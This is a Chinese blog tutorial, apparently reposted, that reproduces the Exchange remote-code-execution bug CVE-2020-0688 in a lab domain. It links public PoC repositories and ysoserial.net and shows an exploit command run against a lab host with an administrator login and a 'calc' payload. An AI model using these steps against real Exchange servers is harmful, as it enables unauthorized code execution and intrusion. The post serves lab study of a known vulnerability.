Exchange反序列化漏洞复现（CVE-2020-0688）

其他 2020-10-17 08:25:35 阅读次数: 0

Exchange反序列化漏洞复现（CVE-2020-0688）

环境搭建
漏洞复现
参考文章

环境搭建

参考我的另一篇文章
https://blog.csdn.net/qq_43645782/article/details/106958197
下面的aduser为配置的邮件主机，这里在域环境所以直接使用域内域名，可以使用ip访问
添加一个测试账户
打开https://aduser/ecp/?ExchClientVer=15
登录
在这里插入图片描述
打开
https://aduser/owa/languageselection.aspx
设置时区

在域控添加一个新用户

设置密码

回到https://aduser/ecp/?ExchClientVer=15
添加用户

选择现有用户

漏洞复现

poc下载
https://github.com/Jumbo-WJB/CVE-2020-0688
https://github.com/Ridter/cve-2020-0688
https://github.com/pwntester/ysoserial.net/releases/tag/v1.33
需要下载readline模块

python -m pip install pyreadline

获取ysoserial参数

python3 cve-2020-0688.py -s https://192.168.164.161/owa/ -u whojoe\administrator -p Aa1234. -c calc

在这里插入图片描述
将生成的参数用ysoserial打开

在这里插入图片描述
将生成的payload填入python脚本中

返回http500
命令执行成功

参考文章

https://github.com/pwntester/ysoserial.net/releases/tag/v1.33
https://github.com/Ridter/cve-2020-0688

猜你喜欢

转载自blog.csdn.net/qq_43645782/article/details/106930268

Exchange反序列化漏洞复现（CVE-2020-0688）

【漏洞通告】微软Exchange远程代码执行漏洞（CVE-2020-0688）通告

漏洞复现|Dubbo反序列化漏洞CVE-2020-17564

Apache Tomcat 反序列化代码执行漏洞复现(CVE-2020-9484)

Yii2 反序列化漏洞(CVE-2020-15148)复现

反序列化漏洞CVE-2017-10271复现

vulhub漏洞复现-Apache Shiro(CVE-2016-4437) 反序列化漏洞复现

2019-11-2：漏洞复现，ActiveMQ反序列化漏洞，CVE-2015-5254

漏洞复现 - Weblogic 反序列化命令执行漏洞（CVE-2018-2628）

漏洞复现 - ActiveMQ反序列化漏洞(CVE-2015-5254)

Jenkins-CVE-2016-0792漏洞复现（Xstream 反序列化漏洞）

漏洞复现｜Weblogic反序列化命令执行漏洞(CVE-2018-2628)

【vulhub漏洞复现】CVE-2015-5254 ActiveMQ反序列化漏洞

php反序列化漏洞复现

typecho反序列化漏洞复现

反序列化漏洞复现总结

shiro反序列化漏洞复现

JBoss 反序列化漏洞复现

Fastjson反序列化漏洞复现

Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 复现

ActiveMQ反序列化漏洞（CVE-2015-5254）复现

Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271）检测与利用复现

【Vulhub】CVE-2017-7504 JBOSS反序列化漏洞复现

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

Jboss反序列化漏洞复现(CVE-2017-12149)

PHP反序列化漏洞-CVE-2016-7124(绕过__wakeup)复现

Apache Log4j SocketServer反序列化漏洞复现(CVE-2019-17571)

CVE-2016-7124php反序列化漏洞复现

Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现

jboss反序列化漏洞复现(CVE-2017-7504)

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)